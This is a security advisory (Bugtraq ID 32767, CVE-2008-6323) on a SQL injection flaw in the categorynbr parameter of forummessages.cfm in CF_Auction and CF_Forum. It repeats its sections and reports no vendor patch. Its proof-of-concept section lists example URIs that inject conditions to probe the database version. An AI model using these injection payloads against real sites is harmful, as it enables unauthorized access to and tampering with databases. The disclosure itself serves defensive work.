CF_Auction and CF_Forum 'forummessages.cfm' SQL Injection Vulnerability
BID:32767
Info
CF_Auction and CF_Forum 'forummessages.cfm' SQL Injection Vulnerability
| Bugtraq ID: | 32767 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6323 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 10 2008 12:00AM |
| Updated: | Apr 13 2015 09:12PM |
| Credit: | AlpHaNiX |
| Vulnerable: |
CFMSource CF_Forum 0 CFMSource CF_Auction 0 |
| Not Vulnerable: | |
Discussion
CF_Auction and CF_Forum 'forummessages.cfm' SQL Injection Vulnerability
CF_Auction and CF_Forum are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CF_Auction and CF_Forum are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
CF_Auction and CF_Forum 'forummessages.cfm' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/forums/htdocs/forummessages.cfm?topicnbr=2 categorynbr=2%20and%20substring(@@version,1,1)=5
http://www.example.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=4
http://www.example.com/forummessages.cfm?topicnbr=4categorynbr=2%20and%20substring(@@version,1,1)=3
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/forums/htdocs/forummessages.cfm?topicnbr=2 categorynbr=2%20and%20substring(@@version,1,1)=5
http://www.example.com/forummessages.cfm?topicnbr=4&categorynbr=2%20and%20substring(@@version,1,1)=4
http://www.example.com/forummessages.cfm?topicnbr=4categorynbr=2%20and%20substring(@@version,1,1)=3
Solution / Fix
CF_Auction and CF_Forum 'forummessages.cfm' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CF_Auction and CF_Forum 'forummessages.cfm' SQL Injection Vulnerability
References:
References:
- Vendor Homepage (CFMSourfce)